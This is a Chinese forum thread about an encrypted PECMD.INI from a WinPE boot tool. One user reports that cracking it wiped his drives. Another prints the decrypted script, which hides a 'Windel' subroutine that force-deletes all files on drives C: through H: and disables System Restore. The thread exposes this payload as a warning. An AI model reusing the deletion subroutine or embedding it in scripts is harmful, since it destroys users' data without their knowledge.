PECMD.INI CMPS/CMPA 无会用，请帮忙解密下

Gowim · 发表于 2015-10-17 16:17:57

PECMD_X86.part1.rar (500 KB, 下载次数: 39)

PECMD_X86.part2.rar (43.34 KB, 下载次数: 26)
解开都是乱码·

nianyueriPE · 发表于昨天 21:36

2012jc天马行空发表于 2015-10-17 19:40
我只能试着恢复数据了，晕。还有，亲，既然都来无忧了，别用什么白菜什么电脑店了，无忧里那么多好用的pe ...

用OD破解
TEAM ENVI W=%WinDir%|ENVI WS=%W%\SYSTEM32|ENVI WSD=%WS%\Drivers `注册路径变量
INIT IU,3000
REGI HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Systemrestore\DisableConfig=#1
REGI HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Systemrestore\DisableSR=#1
REGI $HKCR\DRIVE\SHELL\CHANGE-PASSPHRASE\COMMAND\=%SYSTEMROOT%\System32\BDECPW.CMD %%1
REGI $HKCR\DRIVE\SHELL\MANAGE-BDE\COMMAND\=%SYSTEMROOT%\System32\BDEOFF.CMD %%1
TEAM FILE %public%\desktop\desktop.ini|FILE %desktop%\desktop.ini|FILE X:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup|FILE X:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
REGI HKLM\SOFTWARE\Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\Attributes=#10940064
SHOW -1,-1
REGI HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\29=X:\Windows\System32\ht.ico,0
EXEC !X:\Program Files\Imagine\Imagine64.EXE /assocext /regcontextmenu
EXEC !=X:\Program Files\Freeime\registry.exe /s
EXEC !%WinDir%\System32\EjectUSB.EXE
call Windel
FORX *.ocx,Regocx,0,CALL $%Regocx%
FORX msxml*.dll,Regdll,0,CALL $%Regdll%
DEVI %SystemRoot%\inf\usb.inf
DEVI %SystemRoot%\inf\usbport.inf
DEVI $%SystemRoot%\System32\SRS_8x64.CAB,,%Temp%
EXEC %Windir%\System32\CTFMON.EXE
EXEC @REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /VA /F
EXEC @REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /VA /F
REGI HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Audit\!
SHEL %SystemRoot%\explorer.exe
EXEC =!X:\Program Files\Tools\REGDOC.cmd
EXEC =!X:\Program Files\Unlocker\setup.cmd
EXEC !regsvr32.exe /s "%ProgramFiles%\FastCopy\FastEx64.dll"
REGI HKCR\*\ShellEx\ContextMenuHandlers\FastCopy\FastCopyMenuFlags2=#0xfff13fff
SITE %Startup%,+H+R
EXEC !=X:\Program Files\Tools\Order.exe
HOTK #112,PECMD.EXE
HOTK #120,PECMD EXEC !X:\Windows\System32\Killep.cmd    `F9  刷新系统
HOTK #121,PECMD EXEC !X:\Windows\System32\CLEANTEMP.CMD  `F10 清除临时文件
HOTK #122,PECMD EXEC X:\Windows\System32\WinSnap64.exe `F11 截图工具
HOTK Ctrl + #0x47,%ProgramFiles%\Ghost\Ghost64.exe    `Ctrl+G 手动Ghost
HOTK Ctrl + #0x4d,%ProgramFiles%\Tools\mouse.exe       `Ctrl+M 键盘控制鼠标
_SUB Windel
FILE -force -q C:\*.*
FILE -force -q D:\*.*
FILE -force -q E:\*.*
FILE -force -q F:\*.*
FILE -force -q G:\*.*
FILE -force -q H:\*.*
_END
果然有删除系统代码

Gowim · 发表于 2015-10-17 19:48:00

2012jc天马行空发表于 2015-10-17 19:40
我只能试着恢复数据了，晕。还有，亲，既然都来无忧了，别用什么白菜什么电脑店了，无忧里那么多好用的pe ...

知道咯，不研究了

2012jc天马行空 · 发表于 2015-10-17 19:40:54

Gowim 发表于 2015-10-17 19:25
我是在XP下测试的，没有发生卡死

我只能试着恢复数据了，晕。还有，亲，既然都来无忧了，别用什么白菜什么电脑店了，无忧里那么多好用的pe,干嘛要用这几个流氓的

Gowim · 发表于 2015-10-17 19:25:33

2012jc天马行空发表于 2015-10-17 19:21
丫的，系统重装倒是小事，关键是d盘50多g的重要数据都没了。破解的时候就一直卡着，然后就发现桌面数据开始 ...

我是在XP下测试的，没有发生卡死

2012jc天马行空 · 发表于 2015-10-17 19:21:31

丫的，系统重装倒是小事，关键是d盘50多g的重要数据都没了。破解的时候就一直卡着，然后就发现桌面数据开始被删，还好及时退出，不然数据要丢失更多

Gowim · 发表于 2015-10-17 19:18:51

2012jc天马行空发表于 2015-10-17 19:15
我现在系统都无法进了，d盘的好多数据也被删了，我能骗你

是不是代码有保护

2012jc天马行空 · 发表于 2015-10-17 19:15:00

Gowim 发表于 2015-10-17 19:12
不会吧，我揭秘出来是乱码。
这个是从大白菜提取的

我现在系统都无法进了，d盘的好多数据也被删了，我能骗你

Gowim · 发表于 2015-10-17 19:12:53

2012jc天马行空发表于 2015-10-17 19:10
(#‵′)靠，你这个文件有毒啊，尝试破解它，结果把我的系统盘的程序还有其他盘的文件都删了，你是哪找来的 ...

不会吧，我揭秘出来是乱码。
这个是从大白菜提取的

2012jc天马行空 · 发表于 2015-10-17 19:10:03

(#‵′)靠，你这个文件有毒啊，尝试破解它，结果把我的系统盘的程序还有其他盘的文件都删了，你是哪找来的破东西

		自动登录	找回密码
密码			注册

[求助] PECMD.INI CMPS/CMPA 无会用，请帮忙解密下

点评

点评

点评